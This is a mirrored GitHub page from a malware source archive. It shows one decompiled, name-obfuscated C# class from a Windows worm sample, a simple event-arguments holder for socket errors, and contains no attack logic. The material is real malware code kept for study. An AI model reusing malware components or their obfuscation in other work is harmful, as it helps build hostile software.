mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
f2ac1ece55
add
28 lines
848 B
C#
28 lines
848 B
C#
// Decompiled with JetBrains decompiler
|
||
// Type: Ҧ߲๒ʽ໙ୄᴘ.ᐃ੍ẽϝᕦ
|
||
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
||
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
|
||
|
||
using System;
|
||
using System.Net.Sockets;
|
||
|
||
namespace Ҧ߲๒ʽ໙ୄᴘ
|
||
{
|
||
internal class ᐃ੍ẽϝᕦ : EventArgs
|
||
{
|
||
private SocketError ځࣼᅍ;
|
||
private int ᄖᦪ\u0AD3Ἣ;
|
||
|
||
public ᐃ੍ẽϝᕦ(SocketError s_err, int s_n_err)
|
||
{
|
||
this.ځࣼᅍ = s_err;
|
||
this.ᄖᦪ\u0AD3Ἣ = s_n_err;
|
||
}
|
||
|
||
public SocketError \u196Eᪧᣆ\u0A50 => this.ځࣼᅍ;
|
||
|
||
public int \u19D1ႎᴙ\u09D6᭮᭲ᘫᕶᣠ => this.ᄖᦪ\u0AD3Ἣ;
|
||
}
|
||
}
|